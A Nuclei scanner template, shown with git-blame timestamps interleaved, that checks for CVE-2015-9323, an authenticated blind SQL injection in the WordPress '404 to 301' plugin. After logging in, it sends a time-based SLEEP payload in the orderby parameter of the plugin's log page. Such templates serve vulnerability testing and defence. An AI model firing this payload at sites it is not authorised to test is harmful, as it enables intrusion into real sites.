2023-08-14 11:09:55 +00:00
|
|
|
|
id: CVE-2015-9323
|
2023-08-16 05:05:23 +00:00
|
|
|
|
|
2023-08-14 11:09:55 +00:00
|
|
|
|
info:
|
2023-08-16 05:05:23 +00:00
|
|
|
|
name: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
|
2023-08-14 11:09:55 +00:00
|
|
|
|
author: Harsh
|
2023-08-16 05:05:23 +00:00
|
|
|
|
severity: critical
|
2023-08-14 11:09:55 +00:00
|
|
|
|
description: |
|
2023-08-31 11:46:18 +00:00
|
|
|
|
The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
|
2023-09-27 15:51:13 +00:00
|
|
|
|
impact: |
|
|
|
|
|
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or potential compromise of the WordPress site.
|
2023-09-06 13:22:34 +00:00
|
|
|
|
remediation: Fixed in version 2.0.3
|
2023-08-14 11:53:35 +00:00
|
|
|
|
reference:
|
2023-08-14 11:09:55 +00:00
|
|
|
|
- https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
|
|
|
|
|
- http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
|
2023-08-31 11:46:18 +00:00
|
|
|
|
- https://wordpress.org/plugins/404-to-301/#developers
|
2023-08-14 11:53:35 +00:00
|
|
|
|
classification:
|
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2023-08-14 11:09:55 +00:00
|
|
|
|
cvss-score: 9.8
|
2023-08-31 11:46:18 +00:00
|
|
|
|
cve-id: CVE-2015-9323
|
2023-08-14 11:09:55 +00:00
|
|
|
|
cwe-id: CWE-89
|
2023-11-11 17:44:56 +00:00
|
|
|
|
epss-score: 0.00846
|
2023-12-12 11:07:52 +00:00
|
|
|
|
epss-percentile: 0.80189
|
2023-09-06 13:22:34 +00:00
|
|
|
|
cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:*
|
2023-08-14 11:09:55 +00:00
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2023-08-16 05:05:23 +00:00
|
|
|
|
max-request: 2
|
2023-08-31 11:46:18 +00:00
|
|
|
|
vendor: duckdev
|
|
|
|
|
product: 404_to_301
|
2023-09-06 13:22:34 +00:00
|
|
|
|
framework: wordpress
|
2023-12-05 09:50:33 +00:00
|
|
|
|
tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
|
2023-08-14 11:09:55 +00:00
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
2023-08-16 05:05:23 +00:00
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
2023-08-14 11:09:55 +00:00
|
|
|
|
- |
|
|
|
|
|
@timeout: 15s
|
|
|
|
|
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
2023-08-14 11:53:35 +00:00
|
|
|
|
|
2023-08-14 11:09:55 +00:00
|
|
|
|
matchers:
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- 'duration>=5'
|
|
|
|
|
- 'status_code == 200'
|
|
|
|
|
- 'contains(content_type, "text/html")'
|
2023-08-16 05:05:23 +00:00
|
|
|
|
- 'contains(body, "404-to-301")'
|
2023-08-14 11:09:55 +00:00
|
|
|
|
condition: and
|
2023-12-29 09:30:44 +00:00
|
|
|
|
# digest: 4a0a00473045022100b4d2e2ebfccd89bce918cf6b82890dc081ef6fc2810475e962b1d42ad1d660700220365c6d8a9b202201389eca3687a442b57abc62ec85356753ab8c7d2fa80430c9:922c64590222798bb761d5b6d8e72950
|